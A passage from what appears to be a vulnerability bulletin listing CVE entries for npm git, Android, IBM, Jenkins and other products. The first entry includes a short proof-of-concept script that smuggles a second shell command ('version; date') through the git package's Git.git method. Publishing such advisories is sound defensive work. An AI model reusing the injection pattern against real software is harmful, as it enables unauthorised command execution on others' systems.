All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "version; date"; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work.2022-03-17not yet calculatedCVE-2021-23632
MISC
gitea -- gitea
 
The avatar middleware in Gitea before 1.13.6 allows Directory Traversal via a crafted URL.2022-03-15not yet calculatedCVE-2021-29134
MISC
MISC
glewlwyd -- sso_server
 
scheme/webauthn.c in Glewlwyd SSO server 2.x before 2.6.2 has a buffer overflow associated with a webauthn assertion.2022-03-18not yet calculatedCVE-2022-27240
MISC
MISC
go-ethereum -- go-ethereum
 
Go-Ethereum v1.10.9 was discovered to contain an issue which allows attackers to cause a denial of service (DoS) via sending an excessive amount of messages to a node. This is caused by missing memory in the component /ethash/algorithm.go.2022-03-17not yet calculatedCVE-2021-42219
MISC
golang -- go
 
golang.org/x/crypto/ssh before 0.0.0-20220314234659-1baeb1ce4c0b in Go through 1.16.15 and 1.17.x through 1.17.8 allows an attacker to crash a server in certain circumstances involving AddHostKey.2022-03-18not yet calculatedCVE-2022-27191
CONFIRM
MISC
google -- androidIn ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-204585345References: N/A2022-03-16not yet calculatedCVE-2021-39722
MISC
google -- androidIn usb_gadget_giveback_request of core.c, there is a possible use after free out of bounds read due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-161010552References: Upstream kernel2022-03-16not yet calculatedCVE-2021-39792
MISC
google -- androidProduct: AndroidVersions: Android kernelAndroid ID: A-209014813References: N/A2022-03-16not yet calculatedCVE-2021-39723
MISC
google -- androidProduct: AndroidVersions: Android kernelAndroid ID: A-208229524References: N/A2022-03-16not yet calculatedCVE-2021-39737
MISC
google -- androidIn TuningProviderBase::GetTuningTreeSet of tuning_provider_base.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205753190References: N/A2022-03-16not yet calculatedCVE-2021-39724
MISC
google -- androidIn gasket_free_coherent_memory_all of gasket_page_table.c, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151454974References: N/A2022-03-16not yet calculatedCVE-2021-39725
MISC
google -- androidIn cd_ParseMsg of cd_codec.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-181782896References: N/A2022-03-16not yet calculatedCVE-2021-39726
MISC
google -- androidIn copy_io_entries of lwis_ioctl.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205992503References: N/A2022-03-16not yet calculatedCVE-2021-39732
MISC
google -- androidIn eicPresentationRetrieveEntryValue of acropora/app/identity/libeic/EicPresentation.c, there is a possible information disclosure due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196388042References: N/A2022-03-16not yet calculatedCVE-2021-39727
MISC
google -- androidIn prepare_io_entry and prepare_response of lwis_ioctl.c and lwis_periodic_io.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995773References: N/A2022-03-16not yet calculatedCVE-2021-39736
MISC
google -- androidIn amcs_cdev_unlocked_ioctl of audiometrics.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206128522References: N/A2022-03-16not yet calculatedCVE-2021-39733
MISC
google -- androidIn sendMessage of OneToOneChatImpl.java (? TBD), there is a possible way to send an RCS message without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-208650395References: N/A2022-03-16not yet calculatedCVE-2021-39734
MISC
google -- androidIn the TitanM chip, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-202006191References: N/A2022-03-16not yet calculatedCVE-2021-39729
MISC
google -- androidIn kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A2022-03-16not yet calculatedCVE-2021-39793
MISC
google -- androidIn TBD of TBD, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206472503References: N/A2022-03-16not yet calculatedCVE-2021-39730
MISC
google -- androidIn ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205036834References: N/A2022-03-16not yet calculatedCVE-2021-39731
MISC
google -- androidIn gasket_alloc_coherent_memory of gasket_page_table.c, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151455484References: N/A2022-03-16not yet calculatedCVE-2021-39735
MISC
google -- androidProduct: AndroidVersions: Android kernelAndroid ID: A-206977562References: N/A2022-03-16not yet calculatedCVE-2021-39716
MISC
google -- androidIn onCreate of RequestManageCredentials.java, there is a possible way for a third party app to install certificates without user approval due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-2051503802022-03-16not yet calculatedCVE-2021-39702
MISC
google -- androidIn multiple functions of odsign_main.cpp, there is a possible way to persist system attack due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-2060907482022-03-16not yet calculatedCVE-2021-39689
MISC
google -- androidIn various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210292376References: Upstream kernel2022-03-16not yet calculatedCVE-2021-39685
MISC
google -- androidIn setDisplayPadding of WallpaperManagerService.java, there is a possible way to cause a persistent DoS due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-2043165112022-03-16not yet calculatedCVE-2021-39690
MISC
google -- androidIn onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-2096115392022-03-16not yet calculatedCVE-2021-39692
MISC
google -- androidIn onUidStateChanged of AppOpsService.java, there is a possible way to access location without a visible indicator due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-2086623702022-03-16not yet calculatedCVE-2021-39693
MISC
google -- androidIn ih264d_parse_decode_slice of ih264d_parse_slice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-2057020932022-03-16not yet calculatedCVE-2021-39667
MISC
google -- androidIn parse of RoleParser.java, there is a possible way for default apps to get permissions explicitly denied by the user due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-2023123272022-03-16not yet calculatedCVE-2021-39694
MISC
google -- androidIn createOrUpdate of BasePermission.java, there is a possible permission bypass due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-2096079442022-03-16not yet calculatedCVE-2021-39695
MISC
google -- androidIn checkFileUriDestination of DownloadProvider.java, there is a possible way to bypass external storage private directories protection due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-2008135472022-03-16not yet calculatedCVE-2021-39697
MISC
google -- androidIn aio_poll_complete_work of aio.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-185125206References: Upstream kernel2022-03-16not yet calculatedCVE-2021-39698
MISC
google -- androidIn serviceConnection of ControlsProviderLifecycleManager.kt, there is a possible way to keep service running in foreground without notification or permission due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-2122868492022-03-16not yet calculatedCVE-2021-39701
MISC
google -- androidIn TBD of TBD, there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195726151References: N/A2022-03-16not yet calculatedCVE-2021-39721
MISC
google -- androidIn updateState of UsbDeviceManager.java, there is a possible unauthorized access of files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-2070575782022-03-16not yet calculatedCVE-2021-39703
MISC
google -- androidIn deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-2099654812022-03-16not yet calculatedCVE-2021-39704
MISC
google -- androidIn getNotificationTag of LegacyVoicemailNotifier.java, there is a possible leak of ICCID due to a permissions bypass. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-1860267462022-03-16not yet calculatedCVE-2021-39705
MISC
google -- androidIn onResume of CredentialStorage.java, there is a possible way to cleanup content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-2001641682022-03-16not yet calculatedCVE-2021-39706
MISC
google -- androidIn onReceive of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-2006889912022-03-16not yet calculatedCVE-2021-39707
MISC
google -- androidIn __show_regs of process.c, there is a possible leak of kernel memory and addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-178379135References: Upstream kernel2022-03-16not yet calculatedCVE-2021-39715
MISC
google -- androidProduct: AndroidVersions: Android kernelAndroid ID: A-207433926References: N/A2022-03-16not yet calculatedCVE-2021-39720
MISC
google -- androidIn lwis_top_register_io of lwis_device_top.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995178References: N/A2022-03-16not yet calculatedCVE-2021-39719
MISC
google -- androidIn ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205035540References: N/A2022-03-16not yet calculatedCVE-2021-39718
MISC
google -- androidIn gatt_process_notification of gatt_cl.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-2061283412022-03-16not yet calculatedCVE-2021-39708
MISC
google -- androidIn iaxxx_btp_write_words of iaxxx-btp.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-198653629References: N/A2022-03-16not yet calculatedCVE-2021-39717
MISC
google -- androidIn ion_buffer_kmap_get of ion.c, there is a possible use-after-free due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205573273References: Upstream kernel2022-03-16not yet calculatedCVE-2021-39714
MISC
google -- androidProduct: AndroidVersions: Android kernelAndroid ID: A-173788806References: Upstream kernel2022-03-16not yet calculatedCVE-2021-39713
MISC
google -- androidIn TBD of TBD, there is a possible user after free vulnerability due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176918884References: N/A2022-03-16not yet calculatedCVE-2021-39712
MISC
google -- androidIn bpf_prog_test_run_skb of test_run.c, there is a possible out of bounds read due to Incorrect Size Value. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-154175781References: Upstream kernel2022-03-16not yet calculatedCVE-2021-39711
MISC
google -- androidProduct: AndroidVersions: Android kernelAndroid ID: A-202160245References: N/A2022-03-16not yet calculatedCVE-2021-39710
MISC
google -- androidIn sendSipAccountsRemovedNotification of SipAccountRegistry.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-2088176182022-03-16not yet calculatedCVE-2021-39709
MISC
google -- androidIn several functions of binder.c, there is a possible way to represent the wrong domain to SELinux due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-200688826References: Upstream kernel2022-03-16not yet calculatedCVE-2021-39686
MISC
google -- android
 
In Package Manger, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-678626802022-03-16not yet calculatedCVE-2021-39624
MISC
google -- android
 
In NotificationStackScrollLayout of NotificationStackScrollLayout.java, there is a possible way to bypass Factory Reset Protections. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-1931495502022-03-16not yet calculatedCVE-2021-0957
MISC
google -- sa360-webquery-bigquery
 
A local attacker could read files from some other users' SA360 reports stored in the /tmp folder during staging process before the files are loaded in BigQuery. We recommend upgrading to version 1.0.3 or above.2022-03-18not yet calculatedCVE-2021-22571
CONFIRM
CONFIRM
gpac -- gpacGPAC 1.0.1 is affected by a heap-based buffer overflow in SFS_AddString () at bifs/script_dec.c.2022-03-14not yet calculatedCVE-2022-24578
MISC
gpac -- gpac
 
GPAC 1.0.1 is affected by a NULL pointer dereference in gf_utf8_wcslen ().2022-03-14not yet calculatedCVE-2022-24577
MISC
gradio -- gradio
 
`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer's computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user's computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs.2022-03-17not yet calculatedCVE-2022-24770
CONFIRM
MISC
MISC
gradle_enterprise -- gradle_enterpriseGradle Enterprise before 2021.4.3 relies on cleartext data transmission in some situations. It uses Keycloak for identity management services. During the sign-in process, Keycloak sets browser cookies that effectively provide remember-me functionality. For backwards compatibility with older Safari versions, Keycloak sets a duplicate of the cookie without the Secure attribute, which allows the cookie to be sent when accessing the location that cookie is set for via HTTP. This creates the potential for an attacker (with the ability to impersonate the Gradle Enterprise host) to capture the login session of a user by having them click an http:// link to the server, despite the real server requiring HTTPS.2022-03-16not yet calculatedCVE-2022-27225
MISC
gradle_enterprise -- gradle_enterprise
 
In Gradle Enterprise before 2021.4.2, the default built-in build cache configuration allowed anonymous write access. If this was not manually changed, a malicious actor with network access to the build cache could potentially populate it with manipulated entries that execute malicious code as part of a build. As of 2021.4.2, the built-in build cache is inaccessible-by-default, requiring explicit configuration of its access-control settings before it can be used. (Remote build cache nodes are unaffected as they are inaccessible-by-default.)2022-03-17not yet calculatedCVE-2022-25364
MISC
MISC
hestiacp -- hestiacp
 
Reflected Cross-site Scripting (XSS) Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.11.2022-03-16not yet calculatedCVE-2022-0986
MISC
CONFIRM
hms -- hmsHMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in department.php.2022-03-15not yet calculatedCVE-2022-25490
MISC
hms -- hmsHMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in appointment.php.2022-03-15not yet calculatedCVE-2022-25491
MISC
hms -- hmsHMS v1.0 was discovered to contain a SQL injection vulnerability via the medicineid parameter in ajaxmedicine.php.2022-03-15not yet calculatedCVE-2022-25492
MISC
hms -- hms
 
HMS v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via treatmentrecord.php.2022-03-15not yet calculatedCVE-2022-25493
MISC
htmldoc -- htmldocA flaw was found in htmldoc before v1.9.12. Heap buffer overflow in pspdf_prepare_outpages(), in ps-pdf.cxx may lead to execute arbitrary code and denial of service.2022-03-16not yet calculatedCVE-2021-23165
MISC
MISC
MISC
MISC
htmldoc -- htmldoc
 
A flaw was found in htmldoc in v1.9.12. Double-free in function pspdf_export(),in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code and denial of service.2022-03-16not yet calculatedCVE-2021-23158
MISC
MISC
MISC
httpie -- httpie
 
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository httpie/httpie prior to 3.1.0.2022-03-15not yet calculatedCVE-2022-0430
MISC
CONFIRM
ibm -- big_sql_and_cloud_pak_for_data
 
IBM Big SQL on IBM Cloud Pak for Data 7.1.0, 7.1.1, 7.2.0, and 7.2.3 could allow an authenticated user with appropriate permissions to obtain sensitive information by bypassing data masking rules using a CREATE TABLE SELECT statement. IBM X-Force ID: 220480.2022-03-14not yet calculatedCVE-2022-22353
CONFIRM
XF
ibm -- business_automation_workflow
 
IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 and IBM Business Process Manager 8.5 and 8.6 stores user credentials in plain clear text which can be read by a lprivileged user. IBM X-Force ID: 214346.2022-03-18not yet calculatedCVE-2021-39046
XF
CONFIRM
ibm -- data_virtualization
 
IBM Data Virtualization on Cloud Pak for Data 1.3.0, 1.4.1, 1.5.0, 1.7.1 and 1.7.3 could allow an authorized user to bypass data masking rules and obtain sensitve information. IBM X-Force ID: 212620.2022-03-14not yet calculatedCVE-2021-38971
XF
CONFIRM
ibm -- engineering_requirements_quality_assistant
 
IBM Engineering Requirements Quality Assistant prior to 3.1.3 could allow an authenticated user to cause a denial of service. IBM X-Force ID: 207413.2022-03-18not yet calculatedCVE-2021-29899
CONFIRM
XF
ibm -- engineering_workflow_management
 
IBM Engineering Workflow Management 7.0, 7.0.1, and 7.0.2 and IBM Rational Team Concert 6.0.6 and 6.0.0.1 could allow an authenticated user to obtain sensitive information about build definitions. IBM X-Force ID: 192707.2022-03-15not yet calculatedCVE-2020-4989
CONFIRM
XF
ibm -- spectrum_copy_data_managementIBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214534.2022-03-14not yet calculatedCVE-2021-39055
CONFIRM
XF
ibm -- spectrum_copy_data_management
 
IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 2200382022-03-14not yet calculatedCVE-2022-22344
CONFIRM
XF
ibm -- spectrum_copy_data_management
 
IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to server-side request forgery, caused by improper input of application server registration function. A remote attacker could exploit this vulnerability using the host address and port fields of the application server registration form in the portal UI to enumerate and attack services that are running on those hosts. IBM X-Force ID: 214441.2022-03-14not yet calculatedCVE-2021-39051
CONFIRM
XF
ibm -- spectrum_protect_operations_center
 
IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 220048.2022-03-14not yet calculatedCVE-2022-22346
CONFIRM
XF
ibm -- spectrum_protect_operations_centers
 
IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to reverse tabnabbing where it could allow a page linked to from within Operations Center to rewrite it. An administrator could enter a link to a malicious URL that another administrator could then click. Once clicked, that malicious URL could then rewrite the original page with a phishing page. IBM X-Force ID: 220139.2022-03-14not yet calculatedCVE-2022-22348
CONFIRM
XF
ibm -- spectrum_protect_plus
 
IBM Spectrum Protect Plus 10.1.0.0 through 10.1.9.2 and IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 do not limit the length of a connection which could allow for a Slowloris HTTP denial of service attack to take place. This can cause the Admin Console to become unresponsive. IBM X-Force ID: 220485.2022-03-14not yet calculatedCVE-2022-22354
CONFIRM
CONFIRM
XF
in_pluck -- in_pluck
 
In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution.2022-03-18not yet calculatedCVE-2022-26965
MISC
MISC
irz -- mobile_routers
 
A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.2022-03-19not yet calculatedCVE-2022-27226
MISC
MISC
MISC
jenkins -- cloudbees_aws_credentials
 
A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token.2022-03-15not yet calculatedCVE-2022-27199
CONFIRM
MLIST
jenkins -- cloudbees_aws_credentials
 
A cross-site request forgery (CSRF) vulnerability in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token.2022-03-15not yet calculatedCVE-2022-27198
CONFIRM
MLIST
jenkins -- dashboard_view
 
Jenkins Dashboard View Plugin 2.18 and earlier does not perform URL validation for the Iframe Portlet's Iframe source URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure views.2022-03-15not yet calculatedCVE-2022-27197
CONFIRM
MLIST
jenkins -- dbcharts
 
Jenkins dbCharts Plugin 0.5.2 and earlier stores JDBC connection passwords unencrypted in its global configuration file on the Jenkins controller where they can be viewed by users with access to the Jenkins controller file system.2022-03-15not yet calculatedCVE-2022-27216
CONFIRM
MLIST
jenkins -- environment_dashboard
 
Jenkins Environment Dashboard Plugin 1.1.10 and earlier does not escape the Environment order and the Component order configuration values in its views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Configure permission.2022-03-15not yet calculatedCVE-2022-27213
CONFIRM
MLIST
jenkins -- extended_choiceJenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Item/Configure permission to read values from arbitrary JSON and Java properties files on the Jenkins controller.2022-03-15not yet calculatedCVE-2022-27203
CONFIRM
MLIST
jenkins -- extended_choiceJenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier does not escape the value and description of extended choice parameters of radio buttons or check boxes type, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.2022-03-15not yet calculatedCVE-2022-27202
CONFIRM
MLIST
jenkins -- extended_choice
 
A cross-site request forgery vulnerability in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers to connect to an attacker-specified URL.2022-03-15not yet calculatedCVE-2022-27204
CONFIRM
MLIST
jenkins -- extended_choice
 
A missing permission check in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL.2022-03-15not yet calculatedCVE-2022-27205
CONFIRM
MLIST
jenkins -- favorite
 
Jenkins Favorite Plugin 2.4.0 and earlier does not escape the names of jobs in the favorite column, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure or Item/Create permissions.2022-03-15not yet calculatedCVE-2022-27196
CONFIRM
MLIST
jenkins -- folder-based_authorization_strategy
 
Jenkins Folder-based Authorization Strategy Plugin 1.3 and earlier does not escape the names of roles shown on the configuration form, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission.2022-03-15not yet calculatedCVE-2022-27200
CONFIRM
MLIST
jenkins -- git_branches_parameter
 
Jenkins List Git Branches Parameter Plugin 0.0.9 and earlier does not escape the name of the 'List Git branches (and more)' parameter, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.2022-03-15not yet calculatedCVE-2022-27212
CONFIRM
MLIST
jenkins -- gitlab_authentication
 
Jenkins GitLab Authentication Plugin 1.13 and earlier stores the GitLab client secret unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.2022-03-15not yet calculatedCVE-2022-27206
CONFIRM
MLIST
jenkins -- global-build-stats
 
Jenkins global-build-stats Plugin 1.5 and earlier does not escape multiple fields in the chart configuration on the 'Global Build Stats' page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission.2022-03-15not yet calculatedCVE-2022-27207
CONFIRM
MLIST
jenkins -- incapptic_connect_uploader
 
Jenkins incapptic connect uploader Plugin 1.15 and earlier stores tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.2022-03-15not yet calculatedCVE-2022-27218
CONFIRM
MLIST
jenkins -- kubernetes_continuous_deployJenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows users with Credentials/Create permission to read arbitrary files on the Jenkins controller.2022-03-15not yet calculatedCVE-2022-27208
CONFIRM
MLIST
jenkins -- kubernetes_continuous_deploy
 
A missing/An incorrect permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.2022-03-15not yet calculatedCVE-2022-27211
CONFIRM
MLIST
jenkins -- kubernetes_continuous_deploy
 
A cross-site request forgery (CSRF) vulnerability in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.2022-03-15not yet calculatedCVE-2022-27210
CONFIRM
MLIST
jenkins -- kubernetes_continuous_deploy
 
A missing permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.2022-03-15not yet calculatedCVE-2022-27209
CONFIRM
MLIST
jenkins -- parameterized_trigger
 
Jenkins Parameterized Trigger Plugin 2.43 and earlier captures environment variables passed to builds triggered using Jenkins Parameterized Trigger Plugin, including password parameter values, in their `build.xml` files. These values are stored unencrypted and can be viewed by users with access to the Jenkins controller file system.2022-03-15not yet calculatedCVE-2022-27195
CONFIRM
MLIST
jenkins -- release_helper
 
A cross-site request forgery (CSRF) vulnerability in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials.2022-03-15not yet calculatedCVE-2022-27214
CONFIRM
MLIST
jenkins -- release_helper
 
A missing permission check in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.2022-03-15not yet calculatedCVE-2022-27215
CONFIRM
MLIST
jenkins -- semantic_versioning
 
Jenkins Semantic Versioning Plugin 1.13 and earlier does not restrict execution of an controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.2022-03-15not yet calculatedCVE-2022-27201
CONFIRM
MLIST
jenkins -- vmware_vrealize_codestream
 
